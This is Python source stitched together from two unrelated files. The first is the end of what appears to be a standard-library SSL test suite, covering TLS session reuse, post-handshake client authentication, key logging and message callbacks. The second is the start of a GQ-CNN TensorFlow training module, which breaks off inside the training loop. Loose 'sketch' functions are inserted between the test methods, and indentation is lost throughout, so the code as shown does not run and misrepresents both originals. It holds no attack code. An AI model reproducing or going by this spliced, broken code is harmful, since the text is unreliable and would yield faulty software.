sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
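# Hedged sketch of TLS 1.2 session resumption using the same ssl API the test
# above drives through server_params_test; host, port and cafile are
# placeholders, not values from this file.
def _session_resumption_sketch(host, port, cafile):
    import socket
    import ssl
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.load_verify_locations(cafile)
    ctx.maximum_version = ssl.TLSVersion.TLSv1_2  # sessions are surfaced for <= TLS 1.2 here
    with socket.create_connection((host, port)) as raw_sock:
        with ctx.wrap_socket(raw_sock, server_hostname=host) as s:
            session = s.session  # captured after the full handshake
    with socket.create_connection((host, port)) as raw_sock:
        with ctx.wrap_socket(raw_sock, server_hostname=host, session=session) as s:
            return s.session_reused  # True when the server resumed the session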
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context2.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
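# Hedged sketch of the context configuration behind the post-handshake auth
# (PHA) exchange that the echo server's 'PHA' command exercises above; the
# certificate/CA paths are placeholders.
def _pha_contexts_sketch(server_cert_chain, client_cert_chain, ca_file):
    import ssl
    server_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    server_ctx.load_cert_chain(server_cert_chain)
    server_ctx.load_verify_locations(ca_file)    # CA used to verify client certs
    server_ctx.post_handshake_auth = True        # defer the CertificateRequest
    server_ctx.verify_mode = ssl.CERT_REQUIRED
    client_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    client_ctx.load_verify_locations(ca_file)
    client_ctx.load_cert_chain(client_cert_chain)
    client_ctx.post_handshake_auth = True        # advertise the TLS 1.3 PHA extension
    # After the handshake the server calls verify_client_post_handshake() on its
    # SSLSocket/SSLObject; the client certificate is then available on the next I/O.
    return server_ctx, client_ctx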
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
def msg_cb(conn, direction, version, content_type, msg_type, data):
if support.verbose and content_type == _TLSContentType.ALERT:
info = (conn, direction, version, content_type, msg_type, data)
sys.stdout.write(f"TLS: {info!r}\n")
server_context._msg_callback = msg_cb
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# test sometimes fails with EOF error. Test passes as long as
# server aborts connection with an error.
with self.assertRaisesRegex(
ssl.SSLError,
'(certificate required|EOF occurred)'
):
# receive CertificateRequest
data = s.recv(1024)
self.assertEqual(data, b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
def test_internal_chain_client(self):
client_context, server_context, hostname = testing_context(
server_chain=False
)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
vc = s._sslobj.get_verified_chain()
self.assertEqual(len(vc), 2)
ee, ca = vc
uvc = s._sslobj.get_unverified_chain()
self.assertEqual(len(uvc), 1)
self.assertEqual(ee, uvc[0])
self.assertEqual(hash(ee), hash(uvc[0]))
self.assertEqual(repr(ee), repr(uvc[0]))
self.assertNotEqual(ee, ca)
self.assertNotEqual(hash(ee), hash(ca))
self.assertNotEqual(repr(ee), repr(ca))
self.assertNotEqual(ee.get_info(), ca.get_info())
self.assertIn("CN=localhost", repr(ee))
self.assertIn("CN=our-ca-server", repr(ca))
pem = ee.public_bytes(_ssl.ENCODING_PEM)
der = ee.public_bytes(_ssl.ENCODING_DER)
self.assertIsInstance(pem, str)
self.assertIn("-----BEGIN CERTIFICATE-----", pem)
self.assertIsInstance(der, bytes)
self.assertEqual(
ssl.PEM_cert_to_DER_cert(pem), der
)
def test_internal_chain_server(self):
client_context, server_context, hostname = testing_context()
client_context.load_cert_chain(SIGNED_CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
s.write(b'VERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
s.write(b'UNVERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
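# Illustrative sketch of the keylog facility tested below: secrets for each
# handshake are appended in NSS key-log format to a file that tools such as
# Wireshark can read. The path argument is a placeholder.
def _keylog_context_sketch(path):
    import ssl
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    if HAS_KEYLOG:
        ctx.keylog_filename = path  # every handshake on this context logs its secrets
    return ctx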
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=os_helper.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(os_helper.TESTFN))
ctx.keylog_filename = os_helper.TESTFN
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
self.assertTrue(os.path.isfile(os_helper.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(os_helper.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = os_helper.TESTFN
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = os_helper.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_msg_callback_deadlock_bpo43577(self):
client_context, server_context, hostname = testing_context()
server_context2 = testing_context()[1]
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
def sni_cb(sock, servername, ctx):
sock.context = server_context2
server_context._msg_callback = msg_cb
server_context.sni_callback = sni_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
def setUpModule():
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
thread_info = threading_helper.threading_setup()
unittest.addModuleCleanup(threading_helper.threading_cleanup, *thread_info)
if __name__ == "__main__":
unittest.main()
trainer_tf.py
# -*- coding: utf-8 -*-
"""
Copyright ©2017. The Regents of the University of California (Regents). All Rights Reserved.
Permission to use, copy, modify, and distribute this software and its documentation for educational,
research, and not-for-profit purposes, without fee and without a signed licensing agreement, is
hereby granted, provided that the above copyright notice, this paragraph and the following two
paragraphs appear in all copies, modifications, and distributions. Contact The Office of Technology
Licensing, UC Berkeley, 2150 Shattuck Avenue, Suite 510, Berkeley, CA 94720-1620, (510) 643-
7201, otl@berkeley.edu, http://ipira.berkeley.edu/industry-info for commercial licensing opportunities.
IN NO EVENT SHALL REGENTS BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT, SPECIAL,
INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOST PROFITS, ARISING OUT OF
THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION, EVEN IF REGENTS HAS BEEN
ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
REGENTS SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE SOFTWARE AND ACCOMPANYING DOCUMENTATION, IF ANY, PROVIDED
HEREUNDER IS PROVIDED "AS IS". REGENTS HAS NO OBLIGATION TO PROVIDE
MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
"""
"""
Trains a GQCNN network using Tensorflow backend.
Author: Vishal Satish and Jeff Mahler
"""
import argparse
import collections
import copy
import json
import pickle as pkl
import os
import random
import shutil
import signal
import subprocess
import sys
import threading
import time
import multiprocessing as mp
import queue
import cv2
import numpy as np
import scipy.misc as sm
import scipy.stats as ss
import tensorflow as tf
from autolab_core import BinaryClassificationResult, RegressionResult, TensorDataset, YamlConfig, Logger
from autolab_core.constants import *
import autolab_core.utils as utils
from gqcnn.utils import ImageMode, TrainingMode, GripperMode, InputDepthMode, GeneralConstants, TrainStatsLogger, pose_dim, read_pose_data, weight_name_to_layer_name, GQCNNTrainingStatus
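# Hedged usage sketch (not part of the original module): how the trainer class
# defined below is typically driven. get_gqcnn_model is assumed to be the model
# factory exported by the gqcnn package, and the paths/config keys are
# placeholders for illustration only.
def _example_training_run(dataset_dir, output_dir, train_config_path):
    from gqcnn import get_gqcnn_model  # assumed import; adjust to the installed package layout
    train_config = YamlConfig(train_config_path)
    gqcnn = get_gqcnn_model()(train_config['gqcnn'])  # build a TF GQ-CNN from its sub-config
    trainer = GQCNNTrainerTF(gqcnn,
                             dataset_dir,
                             split_name='image_wise',
                             output_dir=output_dir,
                             config=train_config)
    trainer.train()  # or trainer.finetune('<path to a pre-trained model>')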
class GQCNNTrainerTF(object):
""" Trains a GQ-CNN with Tensorflow backend. """
def __init__(self, gqcnn,
dataset_dir,
split_name,
output_dir,
config,
name=None,
progress_dict=None,
verbose=True):
"""
Parameters
----------
gqcnn : :obj:`GQCNN`
grasp quality neural network to optimize
dataset_dir : str
path to the training / validation dataset
split_name : str
name of the split to train on
output_dir : str
path to save the model output
config : dict
dictionary of configuration parameters
name : str
name of the model
progress_dict : dict
optional dictionary used to report training status and epoch progress back to the caller
verbose : bool
whether to also log training output to the console
"""
self.gqcnn = gqcnn
self.dataset_dir = dataset_dir
self.split_name = split_name
self.output_dir = output_dir
self.cfg = config
self.tensorboard_has_launched = False
self.model_name = name
self.progress_dict = progress_dict
self.finetuning = False
# create a directory for the model
if self.model_name is None:
model_id = utils.gen_experiment_id()
self.model_name = 'model_%s' %(model_id)
self.model_dir = os.path.join(self.output_dir, self.model_name)
if not os.path.exists(self.model_dir):
os.mkdir(self.model_dir)
# set up logger
self.logger = Logger.get_logger(self.__class__.__name__, log_file=os.path.join(self.model_dir, 'training.log'), silence=(not verbose), global_log_file=verbose)
# check default split
if split_name is None:
self.logger.warning('Using default image-wise split.')
self.split_name = 'image_wise'
# update cfg for saving
self.cfg['dataset_dir'] = self.dataset_dir
self.cfg['split_name'] = self.split_name
def _create_loss(self):
""" Creates a loss based on config file
Returns
-------
:obj:`tensorflow Tensor`
loss
"""
if self.cfg['loss'] == 'l2':
return (1.0 / self.train_batch_size) * tf.nn.l2_loss(tf.subtract(tf.nn.sigmoid(self.train_net_output), self.train_labels_node))
elif self.cfg['loss'] == 'sparse':
if self._angular_bins > 0:
log = tf.reshape(tf.dynamic_partition(self.train_net_output, self.train_pred_mask_node, 2)[1], (-1, 2))
return tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(_sentinel=None, labels=self.train_labels_node,
logits=log))
else:
return tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(_sentinel=None, labels=self.train_labels_node, logits=self.train_net_output, name=None))
elif self.cfg['loss'] == 'weighted_cross_entropy':
return tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits(targets=tf.reshape(self.train_labels_node, [-1,1]),
logits=self.train_net_output,
pos_weight=self.pos_weight,
name=None))
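# Note: self.cfg['loss'] must be one of 'l2', 'sparse' or
# 'weighted_cross_entropy'; any other value falls through the branches above
# and the method returns None.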
def _create_optimizer(self, loss, batch, var_list, learning_rate):
""" Create optimizer based on config file
Parameters
----------
loss : :obj:`tensorflow Tensor`
loss to use, generated with _create_loss()
batch : :obj:`tf.Variable`
variable to keep track of the current gradient step number
var_list : :obj:`list`
list of tf.Variable objects to update to minimize the loss (e.g. network weights)
learning_rate : float
learning rate for training
Returns
-------
:obj:`tf.train.Optimizer`
optimizer
"""
# instantiate optimizer
if self.cfg['optimizer'] == 'momentum':
optimizer = tf.train.MomentumOptimizer(learning_rate, self.momentum_rate)
elif self.cfg['optimizer'] == 'adam':
optimizer = tf.train.AdamOptimizer(learning_rate)
elif self.cfg['optimizer'] == 'rmsprop':
optimizer = tf.train.RMSPropOptimizer(learning_rate)
else:
raise ValueError('Optimizer %s not supported' %(self.cfg['optimizer']))
# compute gradients
gradients, variables = zip(*optimizer.compute_gradients(loss, var_list=var_list))
# clip gradients to prevent exploding gradient problem
gradients, global_grad_norm = tf.clip_by_global_norm(gradients, self.max_global_grad_norm)
# generate op to apply gradients
apply_grads = optimizer.apply_gradients(zip(gradients, variables), global_step=batch)
return apply_grads, global_grad_norm
def _launch_tensorboard(self):
""" Launches Tensorboard to visualize training """
FNULL = open(os.devnull, 'w')
self.logger.info(
"Launching Tensorboard, Please navigate to localhost:{} in your favorite web browser to view summaries".format(self._tensorboard_port))
self._tensorboard_proc = subprocess.Popen(['tensorboard', '--port', str(self._tensorboard_port),'--logdir', self.summary_dir], stdout=FNULL)
def _close_tensorboard(self):
"""Closes Tensorboard process."""
self.logger.info('Closing Tensorboard...')
self._tensorboard_proc.terminate()
def train(self):
""" Perform optimization. """
with self.gqcnn.tf_graph.as_default():
self._train()
def _train(self):
""" Perform optimization. """
start_time = time.time()
# run setup
if self.progress_dict is not None:
self.progress_dict['training_status'] = GQCNNTrainingStatus.SETTING_UP
self._setup()
# build network
self.gqcnn.initialize_network(self.input_im_node, self.input_pose_node)
# optimize weights
if self.progress_dict is not None:
self.progress_dict['training_status'] = GQCNNTrainingStatus.TRAINING
self._optimize_weights()
def finetune(self, base_model_dir):
""" Perform fine-tuning.
Parameters
----------
base_model_dir : str
path to the pre-trained base model to use
"""
with self.gqcnn.tf_graph.as_default():
self._finetune(base_model_dir)
def _finetune(self, base_model_dir):
""" Perform fine-tuning.
Parameters
----------
base_model_dir : str
path to the pre-trained base model to use
"""
# set flag and base model for fine-tuning
self.finetuning = True
self.base_model_dir = base_model_dir
# run setup
self._setup()
# build network
self.gqcnn.set_base_network(base_model_dir)
self.gqcnn.initialize_network(self.input_im_node, self.input_pose_node)
# optimize weights
if self.progress_dict is not None:
self.progress_dict['training_status'] = GQCNNTrainingStatus.TRAINING
self._optimize_weights(finetune=True)
def _optimize_weights(self, finetune=False):
""" Optimize the network weights. """
start_time = time.time()
# setup output
self.train_net_output = self.gqcnn.output
if self.training_mode == TrainingMode.CLASSIFICATION:
if self.cfg['loss'] == 'weighted_cross_entropy':
self.gqcnn.add_sigmoid_to_output()
else:
self.gqcnn.add_softmax_to_output()
elif self.training_mode == TrainingMode.REGRESSION:
self.gqcnn.add_sigmoid_to_output()
else:
raise ValueError('Training mode: {} not supported !'.format(self.training_mode))
train_predictions = self.gqcnn.output
drop_rate_in = self.gqcnn.input_drop_rate_node
self.weights = self.gqcnn.weights
# once weights have been initialized create tf Saver for weights
self.saver = tf.train.Saver()
# form loss
with tf.name_scope('loss'):
# part 1: error
loss = self._create_loss()
unregularized_loss = loss
# part 2: regularization
layer_weights = list(self.weights.values())  # materialize the view so it can be indexed under Python 3
with tf.name_scope('regularization'):
regularizers = tf.nn.l2_loss(layer_weights[0])
for w in layer_weights[1:]:
regularizers = regularizers + tf.nn.l2_loss(w)
loss += self.train_l2_regularizer * regularizers
# setup learning rate
batch = tf.Variable(0)
learning_rate = tf.train.exponential_decay(
self.base_lr, # base learning rate.
batch * self.train_batch_size, # current index into the dataset.
self.decay_step, # decay step.
self.decay_rate, # decay rate.
staircase=True)
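# with staircase=True this evaluates to
#   lr(step) = base_lr * decay_rate ** floor(step * train_batch_size / decay_step),
# i.e. the learning rate is multiplied by decay_rate after every decay_step
# training examples have been processed.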
# setup variable list
var_list = list(self.weights.values())
if finetune:
var_list = []
for weights_name, weights_val in self.weights.items():
layer_name = weight_name_to_layer_name(weights_name)
if self.optimize_base_layers or layer_name not in self.gqcnn._base_layer_names:
var_list.append(weights_val)
# create optimizer
with tf.name_scope('optimizer'):
apply_grad_op, global_grad_norm = self._create_optimizer(loss, batch, var_list, learning_rate)
# add a handler for SIGINT for graceful exit
def handler(signum, frame):
self.logger.info('caught CTRL+C, exiting...')
self._cleanup()
sys.exit(0)
signal.signal(signal.SIGINT, handler)
# now that everything in our graph is set up, we write the graph to the summary event so it can be visualized in tensorboard
self.summary_writer.add_graph(self.gqcnn.tf_graph)
# begin optimization loop
try:
# start prefetch queue workers
self.prefetch_q_workers = []
seed = self._seed
for i in range(self.num_prefetch_q_workers):
if self.num_prefetch_q_workers > 1 or not self._debug:
seed = np.random.randint(GeneralConstants.SEED_SAMPLE_MAX)
p = mp.Process(target=self._load_and_enqueue, args=(seed,))
p.start()
self.prefetch_q_workers.append(p)
# init TF variables
init = tf.global_variables_initializer()
self.sess.run(init)
self.logger.info('Beginning Optimization...')
# create a TrainStatsLogger object to log training statistics at certain intervals
self.train_stats_logger = TrainStatsLogger(self.model_dir)
# loop through training steps
training_range = range(int(self.num_epochs * self.num_train) // self.train_batch_size)
for step in training_range:
# run optimization
